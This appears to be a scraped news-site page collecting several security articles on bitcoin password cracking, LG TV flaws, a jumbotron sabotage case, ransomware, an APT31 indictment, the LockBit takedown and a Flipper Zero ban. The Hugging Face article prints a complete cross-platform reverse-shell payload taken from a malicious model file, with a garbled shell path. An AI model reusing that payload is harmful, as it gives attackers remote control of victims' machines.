

Researchers crack 11-year-old password, recover $3 million in bitcoin

Illustration of a wallet

Flavio Coelho/Getty Images

Two years ago when “Michael,” an owner of cryptocurrency, contacted Joe Grand to help recover access to about $2 million worth of bitcoin he stored in encrypted format on his computer, Grand turned him down.

Michael, who is based in Europe and asked to remain anonymous, stored the cryptocurrency in a password-protected digital wallet. He generated a password using the RoboForm password manager and stored that password in a file encrypted with a tool called TrueCrypt. At some point, that file got corrupted, and Michael lost access to the 20-character password he had generated to secure his 43.6 BTC (worth a total of about 4,000 euros, or $5,300, in 2013). Michael used the RoboForm password manager to generate the password but did not store it in his manager. He worried that someone would hack his computer and obtain the password.

“At [that] time, I was really paranoid with my security,” he laughs.

Grand is a famed hardware hacker who in 2022 helped another crypto wallet owner recover access to $2 million in cryptocurrency he thought he’d lost forever after forgetting the PIN to his Trezor wallet. Since then, dozens of people have contacted Grand to help them recover their treasure. But Grand, known by the hacker handle “Kingpin,” turns down most of them, for various reasons.

Grand is an electrical engineer who began hacking computing hardware at age 10 and in 2008 cohosted the Discovery Channel’s Prototype This show. He now consults with companies that build complex digital systems to help them understand how hardware hackers like him might subvert their systems. He cracked the Trezor wallet in 2022 using complex hardware techniques that forced the USB-style wallet to reveal its password.

But Michael stored his cryptocurrency in a software-based wallet, which meant none of Grand’s hardware skills were relevant this time. He considered brute-forcing Michael’s password—writing a script to automatically guess millions of possible passwords to find the correct one—but determined this wasn’t feasible. He briefly considered that the RoboForm password manager Michael used to generate his password might have a flaw in the way it generated passwords, which would allow him to guess the password more easily. Grand, however, doubted such a flaw existed.

Michael contacted multiple people who specialize in cracking cryptography; they all told him “there’s no chance” of retrieving his money. But last June he approached Grand again, hoping to convince him to help, and this time Grand agreed to give it a try, working with a friend named Bruno in Germany who also hacks digital wallets.

Researchers crack 11-year-old password, recover $3 million in bitcoin Read More »


Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one

Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one

Getty Images

As many as 91,000 LG TVs face the risk of being commandeered unless they receive a just-released security update patching four critical vulnerabilities discovered late last year.

The vulnerabilities are found in four LG TV models that collectively comprise slightly more than 88,000 units around the world, according to results returned by the Shodan search engine for Internet-connected devices. The vast majority of those units are located in South Korea, followed by Hong Kong, the US, Sweden, and Finland. The models are:

  • LG43UM7000PLA running webOS 4.9.7 – 5.30.40
  • OLED55CXPUA running webOS 5.5.0 – 04.50.51
  • OLED48C1PUB running webOS 6.3.3-442 (kisscurl-kinglake) – 03.36.50
  • OLED55A23LA running webOS 7.3.1-43 (mullet-mebin) – 03.33.85

Starting Wednesday, updates are available through these devices’ settings menu.

Got root?

According to Bitdefender—the security firm that discovered the vulnerabilities—malicious hackers can exploit them to gain root access to the devices and inject commands that run at the OS level. The vulnerabilities, which affect internal services that allow users to control their sets using their phones, make it possible for attackers to bypass authentication measures designed to ensure only authorized devices can make use of the capabilities.

“These vulnerabilities let us gain root access on the TV after bypassing the authorization mechanism,” Bitdefender researchers wrote Tuesday. “Although the vulnerable service is intended for LAN access only, Shodan, the search engine for Internet-connected devices, identified over 91,000 devices that expose this service to the Internet.”

The key vulnerability making these threats possible resides in a service that allows TVs to be controlled using LG’s ThinkQ smartphone app when it’s connected to the same local network. The service is designed to require the user to enter a PIN code to prove authorization, but an error allows someone to skip this verification step and become a privileged user. This vulnerability is tracked as CVE-2023-6317.

Once attackers have gained this level of control, they can go on to exploit three other vulnerabilities, specifically:

  • CVE-2023-6318, which allows the attackers to elevate their access to root
  • CVE-2023-6319, which allows for the injection of OS commands by manipulating a library for showing music lyrics
  • CVE-2023-6320, which lets an attacker inject authenticated commands by manipulating the com.webos.service.connectionmanager/tv/setVlanStaticAddress application interface.

Thousands of LG TVs are vulnerable to takeover—here’s how to ensure yours isn’t one Read More »


How to hack the Jacksonville Jaguars’ jumbotron (and end up in jail for 220 years)

Three examples of the video screen tampering.

Enlarge / Three examples of the video screen tampering.


Was someone messing with the Jacksonville Jaguars’ giant jumbotron?

On September 16, 2018, the Jaguars were playing the New England Patriots when the in-stadium screen experienced, in the US government’s words, “a loss in reference sync which manifested as a large horizontal green lines [sic] appearing across one whole video board.”

On November 18, during a game against the Pittsburgh Steelers, it happened again—but this time, entire video sub-boards filled with green.

Then, on December 2, 2018, the Indianapolis Colts came to town and the jumbotron glitched a third time as “a single video board experienced a change of what seemed to be the zoom of one of the base graphics displayed.”

The Jaguars’ IT staff could not at the time replicate any of these video errors, and they began to suspect that what they were seeing was not a technical problem but some sort of attack. Digging into log files, they quickly found that the source of the December 2 problem was “a command to change a specific parameter” of the video control software.

Where had the command come from? An Abekas Mira video control server known as MIRA9120. The Abekas Mira was meant to help in the production and display of instant replay video to be shown in-stadium on the massive jumbotron, but this particular server had been either decommissioned or kept on hand as a spare. In any event, the team thought the server was in storage. But when they went looking, MIRA9120 turned out to be sitting in the main server room, installed on a rack just beside the active Abekas Mira servers.

IT staffers started poking around in MIRA9120 and found the remote-access software TeamViewer, suggesting that someone had been controlling MIRA9120 from somewhere else. But only limited data about the culprit could be gleaned, because the TeamViewer instance had connection logging disabled.

On December 3, the Jaguars’ IT staff disconnected MIRA9120 from the other video control servers—but they left it powered on and in place. Then they turned TeamViewer’s connection logging back on. The idea was to set up a honeypot in case the attacker returned.

During the December 16 game against Washington, TeamViewer recorded another connection into MIRA9120. The TeamViewer account number that accessed the machine was logged, and the information was passed to the FBI, which was now actively investigating the situation. Agents sent a subpoena to TeamViewer, which in February 2019 provided the IP address of the machine that had used the account in question on that day.

This IP address was controlled by Comcast, so a subpoena to Comcast finally turned up the information the Jaguars wanted: MIRA9120 was accessed on December 16 from a home in St. Augustine, Florida—a home where Samuel Arthur Thompson was living.

The secret

The Jags knew Thompson. He had spent nearly five years as a contractor for the football team, helping Jacksonville design and install their stadium screen technology. After installation, Thompson helped to run the system during football games.

Thompson also had a secret: He had been convicted of sexually abusing a 14-year-old boy in Alabama in 1988. Thompson had not reported this to the Jaguars, either, though his contract required such a disclosure.

Someone had found out about the conviction and sent an anonymous letter about it to the Jaguars’ management. Once the letter arrived, the Jaguars terminated Thompson’s contract. His last day with the team had been February 23, 2018. The relationship was thought to be over—but maybe it wasn’t.

A closer search of network traffic and log files from that February day revealed that Thompson himself had installed TeamViewer onto MIRA9120 at 9: 09 am. So the pieces all fit: disgruntled employee on final day of work, the TeamViewer install, the IP address in St. Augustine.

But the FBI didn’t secure a warrant until the summer of 2019. Only in July did the FBI raid Thompson’s home in rather polite style, simply knocking on the door. (Thompson would later complain in a court filing that agents should have yelled out who they were and why they were there. He was strongly displeased about being surprised.) Thompson’s child opened the door. When Thompson himself came over, he still had his unlocked iPhone in hand—and an agent immediately grabbed it.

Then the case became something else entirely—because the phone had child sex abuse material (CSAM) on it.

How to hack the Jacksonville Jaguars’ jumbotron (and end up in jail for 220 years) Read More »


Missouri county declares state of emergency amid suspected ransomware attack


Outage occurs on same day as special election, but election offices remain open.

Downtown Kansas City, Missouri, which is part of Jackson County.

Enlarge / Downtown Kansas City, Missouri, which is part of Jackson County.

Jackson County, Missouri, has declared a state of emergency and closed key offices indefinitely as it responds to what officials believe is a ransomware attack that has made some of its IT systems inoperable.

“Jackson County has identified significant disruptions within its IT systems, potentially attributable to a ransomware attack,” officials wrote Tuesday. “Early indications suggest operational inconsistencies across its digital infrastructure and certain systems have been rendered inoperative while others continue to function as normal.”

The systems confirmed inoperable include tax and online property payments, issuance of marriage licenses, and inmate searches. In response, the Assessment, Collection and Recorder of Deeds offices at all county locations are closed until further notice.

The closure occurred the same day that the county was holding a special election to vote on a proposed sales tax to fund a stadium for MLB’s Kansas City Royals and the NFL’s Kansas City Chiefs. Neither the Jackson County Board of Elections nor the Kansas City Board of Elections have been affected by the attack; both remain open.

To date, ransomware attacks have hit 28 county, municipal, or tribal governments this year, according to Brett Callow, a threat analyst with security firm Emsisoft. Last year, there were 95; 106 occurred in 2022.

The Jackson County website says there are 654,000 residents in the 607-square-mile county, which includes most of Kansas City, the biggest city in Missouri.

The response to the attack and the investigation into it have just begun, but so far, officials said they had no evidence that data had been compromised.

“We are currently in the early stages of our diagnostic procedures, working closely with our cybersecurity partners to thoroughly explore all possibilities and identify the root cause of the situation,” officials wrote. “While the investigation considers ransomware as a potential cause, comprehensive analyses are underway to confirm the exact nature of the disruption.”

Jackson County Executive Frank White Jr. has issued an executive order declaring a state of emergency.

“The potential significant budgetary impact of this incident may require appropriations from the County’s emergency fund and, if these funds are found to be insufficient, the enactment of additional budgetary adjustments or cuts,” White wrote. “It is directed that all county staff are to take whatever steps are necessary to protect resident data, county assets, and continue essential services, thereby mitigating the impact of this potential ransomware attack.”

The attack first came to attention Tuesday morning, county officials said on Facebook.

The county has notified law enforcement and retained IT security contractors to help investigate and remediate the attack.

“The County recognizes the impact these closures have on its residents,” officials wrote. “We appreciate the community’s patience and understanding during this time and will provide more information as it becomes available.”

Missouri county declares state of emergency amid suspected ransomware attack Read More »


Justice Department indicts 7 accused in 14-year hack campaign by Chinese gov


Hacks allegedly targeted US officials and politicians, their spouses and dozens of companies.

Justice Department indicts 7 accused in 14-year hack campaign by Chinese gov

peterschreiber.media | Getty Images

The US Justice Department on Monday unsealed an indictment charging seven men with hacking or attempting to hack dozens of US companies in a 14-year campaign furthering an economic espionage and foreign intelligence gathering by the Chinese government.

All seven defendants, federal prosecutors alleged, were associated with Wuhan Xiaoruizhi Science & Technology Co., Ltd. a front company created by the Hubei State Security Department, an outpost of the Ministry of State Security located in Wuhan province. The MSS, in turn, has funded an advanced persistent threat group tracked under names including APT31, Zirconium Violet Typhoon, Judgment Panda, and Altaire.

Relentless 14-year campaign

“Since at least 2010, the defendants … engaged in computer network intrusion activity on behalf of the HSSD targeting numerous US government officials, various US economic and defense industries and a variety of private industry officials, foreign democracy activists, academics and parliamentarians in response to geopolitical events affecting the PRC,” federal prosecutors alleged. “These computer network intrusion activities resulted in the confirmed and potential compromise of work and personal email accounts, cloud storage accounts and telephone call records belonging to millions of Americans, including at least some information that could be released in support of malign influence targeting democratic processes and institutions, and economic plans, intellectual property, and trade secrets belonging to American businesses, and contributed to the estimated billions of dollars lost every year as a result of the PRC’s state-sponsored apparatus to transfer US technology to the PRC.”

The relentless, 14-year campaign targeted thousands of individuals and dozens of companies through the use of zero-day attacks, website vulnerability exploitation, and the targeting of home routers and personal devices of high-ranking US government officials and politicians and election campaign staff from both major US political parties.

“The targeted US government officials included individuals working in the White House, at the Departments of Justice, Commerce, Treasury and State, and US Senators and Representatives of both political parties,” Justice Department officials said. “The defendants and others in the APT31 Group targeted these individuals at both professional and personal email addresses. Additionally in some cases, the defendants also targeted victims’ spouses, including the spouses of a high-ranking Department of Justice official, high-ranking White House officials and multiple United States Senators. Targets also included election campaign staff from both major US political parties in advance of the 2020 election.”

One technique the defendants allegedly used was the sending of emails to journalists, political officials, and companies. The messages, which were made to appear as originating from news outlets or journalists, contained hidden tracking links, which, when activated, gave APT31 members information about the locations, IP addresses, network schematics, and specific devices of the targets for use in follow-on attacks. Some of the targets of these emails included foreign government officials who were part of the Inter-Parliamentary Alliance on China, a group formed after the 1989 Tiananmen Square massacre that’s critical of the Chinese government; every European Union member of that’s a member of that group; and 43 UK parliamentary accounts part of the group or critical of the People’s Republic of China.

APT31 used a variety of methods to infect networks of interest with custom malware such as RAWDOOR, Trochilus, EvilOSX, DropDoor/DropCa, and later the widely available Cobalt Strike Beacon security testing tool. In late 2016, the hacking group exploited what was then a zero-day vulnerability in unnamed software to gain access to an unidentified defense contractor. In their indictment, prosecutors wrote:

Using the zero-day privilege escalation exploit, the Conspirators first obtained administrator access to a subsidiary’s network before ultimately pivoting into the Defense Contractor’s core corporate network,” prosecutors wrote in the indictment. “The Conspirators used a SQL injection, in which they entered malicious code into a web form input box to gain access to information that was not intended to be displayed, to create an account on the subsidiary’s network with the username “testdew23.” The Conspirators used malicious software to grant administrator privileges to the “testdew23” user account. Next, the Conspirators uploaded a web shell, or a script that enables remote administration of the computer, named “Welcome to Chrome,” onto the subsidiary’s web server. Thereafter, the Conspirators used the web shell to upload and execute at least two malicious files on the web server, which were configured to open a connection between the victim’s network and computers outside that network that were controlled by the Conspirators. Through this method, the Conspirators successfully gained unauthorized access to the Defense Contractor’s network.

Other APT31 targets include military contractors and companies in the aerospace, IT services, software, telecommunications, manufacturing, and financial services industries. APT31 has long been known to target not only individuals and entities with information of primary interest but also companies or services that the primary targets rely on. Primary targets were dissidents and critics of the PRC and Western companies in possession of technical information of value to the PRC.

Prosecutors said targets successfully hacked by APT31 include:

  • a cleared defense contractor based in Oklahoma that designed and manufactured military flight simulators for the US military
  • a cleared aerospace and defense contractor based in Tennessee
  • an Alabama-based research corporation in the aerospace and defense industries
  • a Maryland-based professional support services company that serviced the Department of Defense and other government agencies
  • a leading American manufacturer of software and computer services based in California
  • a leading global provider of wireless technology based in Illinois; a technology company based in New York
  • a software company servicing the industrial controls industry based in California
  • an IT consulting company based in California; an IT services and spatial processing company based in Colorado
  • a multifactor authentication company; an American trade association
  • multiple information technology training and support companies
  • a leading provider of 5G network equipment in the United States
  • an IT solutions and 5G integration service company based in Idaho
  • a telecommunications company based in Illinois
  • a voice technology company headquartered in California;
  • a prominent trade organization with offices in New York and elsewhere
  • a manufacturing association based in Washington, DC
  • a steel company
  • an apparel company based in New York
  • an engineering company based in California
  • an energy company based in Texas
  • a finance company headquartered in New York
  • A US multi-national management consulting company with offices in Washington, DC, and elsewhere
  • a financial ratings company based in New York
  • an advertising agency based in New York
  • a consulting company based in Virginia;
  • multiple global law firms based in New York and throughout the United States
  • a law firm software provider
  • a machine learning laboratory based in Virginia
  • a university based in California
  • multiple research hospitals and institutes located in New York and Massachusetts
  • an international non-profit organization headquartered in Washington, DC.

The defendants are:

  • Ni Gaobin (倪高彬), age 38
  • Weng Ming (翁明), 37
  • Cheng Feng (程锋), 34
  • Peng Yaowen (彭耀文), 38
  • Sun Xiaohui (孙小辉), 38
  • Xiong Wang (熊旺), 35
  • Zhao Guangzong (赵光宗), 38

The men were charged with conspiracy to commit computer intrusions and conspiracy to commit wire fraud. While none of the men are in US custody or likely to face prosecution, the US Department of Treasury on Monday sanctioned Wuhan Xiaoruizhi Science and Technology Company, Limited. The department also designated Zhao Guangzong and Ni Gaobin for their roles in hacks targeting US critical infrastructure.

“As a result of today’s action, all property and interests in property of the designated persons and entity described above that are in the United States or in the possession or control of US persons are blocked and must be reported to OFAC,” Treasury officials wrote. “In addition, any entities that are owned, directly or indirectly, individually or in the aggregate, 50 percent or more by one or more blocked persons are also blocked. Unless authorized by a general or specific license issued by OFAC, or exempt, OFAC’s regulations generally prohibit all transactions by US persons or within (or transiting) the United States that involve any property or interests in property of designated or otherwise blocked persons.”

The US State Department is offering $10 million for information leading to the identification or location of any of the defendants or others associated with the campaign.

Justice Department indicts 7 accused in 14-year hack campaign by Chinese gov Read More »


Hugging Face, the GitHub of AI, hosted code that backdoored user devices


Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.


Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.


How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = ""  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »


After years of losing, it’s finally feds’ turn to troll ransomware group


Authorities who took down the ransomware group brag about their epic hack.

After years of losing, it’s finally feds’ turn to troll ransomware group

Getty Images

After years of being outmaneuvered by snarky ransomware criminals who tease and brag about each new victim they claim, international authorities finally got their chance to turn the tables, and they aren’t squandering it.

The top-notch trolling came after authorities from the US, UK, and Europol took down most of the infrastructure belonging to LockBit, a ransomware syndicate that has extorted more than $120 million from thousands of victims around the world. On Tuesday, most of the sites LockBit uses to shame its victims for being hacked, pressure them into paying, and brag of their hacking prowess began displaying content announcing the takedown. The seized infrastructure also hosted decryptors victims could use to recover their data.

The dark web site LockBit once used to name and shame victims, displaying entries such as

Enlarge / The dark web site LockBit once used to name and shame victims, displaying entries such as “press releases,” “LB Backend Leaks,” and “LockbitSupp You’ve been banned from Lockbit 3.0.”


Authorities didn’t use the seized name-and-shame site solely for informational purposes. One section that appeared prominently gloated over the extraordinary extent of the system access investigators gained. Several images indicated they had control of /etc/shadow, a Linux file that stores cryptographically hashed passwords. This file, among the most security-sensitive ones in Linux, can be accessed only by a user with root, the highest level of system privileges.

Screenshot showing a folder named

Enlarge / Screenshot showing a folder named “shadow” with hashes for accounts including “root,” “daemon,” “bin,” and “sys.”

Other images demonstrated that investigators also had complete control of the main web panel and the system LockBit operators used to communicate with affiliates and victims.

Screenshot of a panel used to administer the LockBit site.

Enlarge / Screenshot of a panel used to administer the LockBit site.

Screenshot showing chats between a LockBit affiliate and a victim.

Enlarge / Screenshot showing chats between a LockBit affiliate and a victim.

The razzing didn’t stop there. File names of the images had titles including: “this_is_really_bad.png,” “oh dear.png,” and “doesnt_look_good.png.” The seized page also teased the upcoming doxing of LockbitSupp, the moniker of the main LockBit figure. It read: “Who is LockbitSupp? The $10m question” and displayed images of cash wrapped in chains with padlocks. Copying a common practice of LockBit and competing ransomware groups, the seized site displayed a clock counting down the seconds until the identifying information will be posted.

Screenshot showing

Enlarge / Screenshot showing “who is lockbitsupp?”

In all, authorities said they seized control of 14,000 accounts and 34 servers located in the Netherlands, Germany, Finland, France, Switzerland, Australia, the US, and the UK. Two LockBit suspects have been arrested in Poland and Ukraine, and five indictments and three arrest warrants have been issued. Authorities also froze 200 cryptocurrency accounts linked to the ransomware operation.

“At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement,” Europol officials said. “This data will be used to support ongoing international operational activities focused on targeting the leaders of this group, as well as developers, affiliates, infrastructure, and criminal assets linked to these criminal activities.”

LockBit has operated since at least 2019 under the name “ABCD.” Within three years, it was the most widely circulating ransomware. Like most of its peers, LockBit operates under what’s known as ransomware-as-a-service, in which it provides software and infrastructure to affiliates who use it to compromise victims. LockBit and the affiliates then divide any resulting revenue. Hundreds of affiliates participated.

According to KrebsOnSecurity, one of the LockBit leaders said on a Russian-language crime forum that a vulnerability in the PHP scripting language provided the means for authorities to hack the servers. That detail led to another round of razzing, this time from fellow forum participants.

“Does it mean that the FBI provided a pen-testing service to the affiliate program?” one participant wrote, according to reporter Brian Krebs. “Or did they decide to take part in the bug bounty program? :):).”

Several members also posted memes taunting the group about the security failure.

“In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head—offering $10 million to anyone who could discover his real name,” Krebs wrote. “‘My god, who needs me?’ LockBitSupp wrote on January 22, 2024. ‘There is not even a reward out for me on the FBI website.’”

After years of losing, it’s finally feds’ turn to troll ransomware group Read More »


Canada declares Flipper Zero public enemy No. 1 in car-theft crackdown


How do you ban a device built with open source hardware and software anyway?

A Flipper Zero device

Enlarge / A Flipper Zero device


Canadian Prime Minister Justin Trudeau has identified an unlikely public enemy No. 1 in his new crackdown on car theft: the Flipper Zero, a $200 piece of open source hardware used to capture, analyze and interact with simple radio communications.

On Thursday, the Innovation, Science and Economic Development Canada agency said it will “pursue all avenues to ban devices used to steal vehicles by copying the wireless signals for remote keyless entry, such as the Flipper Zero, which would allow for the removal of those devices from the Canadian marketplace through collaboration with law enforcement agencies.” A social media post by François-Philippe Champagne, the minister of that agency, said that as part of the push “we are banning the importation, sale and use of consumer hacking devices, like flippers, used to commit these crimes.”

In remarks made the same day, Trudeau said the push will target similar tools that he said can be used to defeat anti-theft protections built into virtually all new cars.

“In reality, it has become too easy for criminals to obtain sophisticated electronic devices that make their jobs easier,” he said. “For example, to copy car keys. It is unacceptable that it is possible to buy tools that help car theft on major online shopping platforms.”

Presumably, such tools subject to the ban would include HackRF One and LimeSDR, which have become crucial for analyzing and testing the security of all kinds of electronic devices to find vulnerabilities before they’re exploited. None of the government officials identified any of these tools, but in an email, a representative of the Canadian government reiterated the use of the phrase “pursuing all avenues to ban devices used to steal vehicles by copying the wireless signals for remote keyless entry.”

A humble hobbyist device

The push to ban any of these tools has been met with fierce criticism from hobbyists and security professionals. Their case has only been strengthened by Trudeau’s focus on Flipper Zero. This slim, lightweight device bearing the logo of an adorable dolphin acts as a Swiss Army knife for sending, receiving, and analyzing all kinds of wireless communications. It can interact with radio signals, including RFID, NFC, Bluetooth, Wi-Fi, or standard radio. People can use them to change the channels of a TV at a bar covertly, clone simple hotel key cards, read the RFID chip implanted in pets, open and close some garage doors, and, until Apple issued a patch, send iPhones into a never-ending DoS loop.

The price and ease of use make Flipper Zero ideal for beginners and hobbyists who want to understand how increasingly ubiquitous communications protocols such as NFC and Wi-Fi work. It bundles various open source hardware and software into a portable form factor that sells for an affordable price. Lost on the Canadian government, the device isn’t especially useful in stealing cars because it lacks the more advanced capabilities required to bypass anti-theft protections introduced in more than two decades.

One thing the Flipper Zero is exceedingly ill-equipped for is defeating modern antihack protections built into cars, smartcards, phones, and other electronic devices.

The most prevalent form of electronics-assisted car theft these days, for instance, uses what are known as signal amplification relay devices against keyless ignition and entry systems. This form of hack works by holding one device near a key fob and a second device near the vehicle the fob works with. In the most typical scenario, the fob is located on a shelf near a locked front door, and the car is several dozen feet away in a driveway. By placing one device near the front door and another one next to the car, the hack beams the radio signals necessary to unlock and start the device.

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Convicted console hacker says he paid Nintendo $25 a month from prison

Crime doesn’t pay —

As Gary Bowser rebuilds his life, fellow Team Xecuter indictees have yet to face trial.

It's-a me, the long arm of the law.

Enlarge / It’s-a me, the long arm of the law.

Aurich Lawson / Nintendo / Getty Images

When 54-year-old Gary Bowser pleaded guilty to his role in helping Team Xecuter with their piracy-enabling line of console accessories, he realized he would likely never pay back the $14.5 million he owed Nintendo in civil and criminal penalties. In a new interview with The Guardian, though, Bowser says he began making $25 monthly payments toward those massive fines even while serving a related prison sentence.

Last year, Bowser was released after serving 14 months of that 40-month sentence (in addition to 16 months of pre-trial detention), which was spread across several different prisons. During part of that stay, Bowser tells The Guardian, he was paid $1 an hour for four-hour shifts counseling other prisoners on suicide watch.

From that money, Bowser says he “was paying Nintendo $25 a month” while behind bars. That lines up roughly with a discussion Bowser had with the Nick Moses podcast last year, where he said he had already paid $175 to Nintendo during his detention.

According to The Guardian, Nintendo will likely continue to take 20 to 30 percent of Bowser’s gross income (after paying for “necessities such as rent”) for the rest of his life.

The fall guy?

While people associated with piracy often face fines rather than prison, Nintendo lawyers were upfront that they pushed for jail time for Bowser to “send a message that there are consequences for participating in a sustained effort to undermine the video game industry.” That seems to have been effective, at least as far as Bowser’s concerned; he told The Guardian that “The sentence was like a message to other people that [are] still out there, that if they get caught … [they’ll] serve hard time.”

Bowser appears on the Nick Moses Gaming Podcast from a holding center in Washington state in 2023.

Enlarge / Bowser appears on the Nick Moses Gaming Podcast from a holding center in Washington state in 2023.

Nick Moses 05 Gaming Podcast/YouTube

But Bowser also maintains that he wasn’t directly involved with the coding or manufacture of Team Xecuter’s products, and only worked on incidental details like product testing, promotion, and website coding. Speaking to Ars in 2020, Aurora, a writer for hacking news site Wololo, described Bowser as “kind of a PR guy” for Team Xecuter. Despite this, Bowser said taking a plea deal on just two charges saved him the time and money of fighting all 14 charges made against him in court.

Bowser was arrested in the Dominican Republic in 2020. Fellow Team Xecuter member and French national Max “MAXiMiLiEN” Louarn, who was indicted and detained in Tanzania at the same time as Bowser’s arrest, was still living in France as of mid-2022 and has yet to be extradited to the US. Chinese national and fellow indictee Yuanning Chen remains at large.

“If Mr. Louarn comes in front of me for sentencing, he may very well be doing double-digit years in prison for his role and his involvement, and the same with the other individual [Chen],” US District Judge Robert Lasnik said during Bowser’s sentencing.

Returning to society

During his stay in prison, Bowser tells The Guardian that he suffered a two-week bout of COVID that was serious enough that “a priest would come over once a day to read him a prayer.” A bout of elephantiasis also left him unable to wear a shoe on his left foot and required the use of a wheelchair, he said.

Now that he’s free, Bowser says he has been relying on friends and a GoFundMe page to pay for rent and necessities as he looks for a job. That search could be somewhat hampered by his criminal record and by terms of the plea deal that prevent him from working with any modern gaming hardware.

Despite this, Bowser told The Guardian that his current circumstances are still preferable to a period of homelessness he experienced during his 20s. And while console hacking might be out for Bowser, he is reportedly still “tinkering away with old-school Texas Instruments calculators” to pass the time.

Convicted console hacker says he paid Nintendo $25 a month from prison Read More »


The life and times of Cozy Bear, the Russian hackers who just hit Microsoft and HPE


Hacks by Kremlin-backed group continue to hit hard.

The life and times of Cozy Bear, the Russian hackers who just hit Microsoft and HPE

Getty Images

Hewlett Packard Enterprise (HPE) said Wednesday that Kremlin-backed actors hacked into the email accounts of its security personnel and other employees last May—and maintained surreptitious access until December. The disclosure was the second revelation of a major corporate network breach by the hacking group in five days.

The hacking group that hit HPE is the same one that Microsoft said Friday broke into its corporate network in November and monitored email accounts of senior executives and security team members until being driven out earlier this month. Microsoft tracks the group as Midnight Blizzard. (Under the company’s recently retired threat actor naming convention, which was based on chemical elements, the group was known as Nobelium.) But it is perhaps better known by the name Cozy Bear—though researchers have also dubbed it APT29, the Dukes, Cloaked Ursa, and Dark Halo.

“On December 12, 2023, Hewlett Packard Enterprise was notified that a suspected nation-state actor, believed to be the threat actor Midnight Blizzard, the state-sponsored actor also known as Cozy Bear, had gained unauthorized access to HPE’s cloud-based email environment,” company lawyers wrote in a filing with the Securities and Exchange Commission. “The Company, with assistance from external cybersecurity experts, immediately activated our response process to investigate, contain, and remediate the incident, eradicating the activity. Based on our investigation, we now believe that the threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions.”

An HPE representative said in an email that Cozy Bear’s initial entry into the network was through “a compromised, internal HPE Office 365 email account [that] was leveraged to gain access.” The representative declined to elaborate. The representative also declined to say how HPE discovered the breach.

Cozy Bear hacking its way into the email systems of two of the world’s most powerful companies and monitoring top employees’ accounts for months aren’t the only similarities between the two events. Both breaches also involved compromising a single device on each corporate network, then escalating that toehold to the network itself. From there, Cozy Bear camped out undetected for months. The HPE intrusion was all the more impressive because Wednesday’s disclosure said that the hackers also gained access to Sharepoint servers in May. Even after HPE detected and contained that breach a month later, it would take HPE another six months to discover the compromised email accounts.

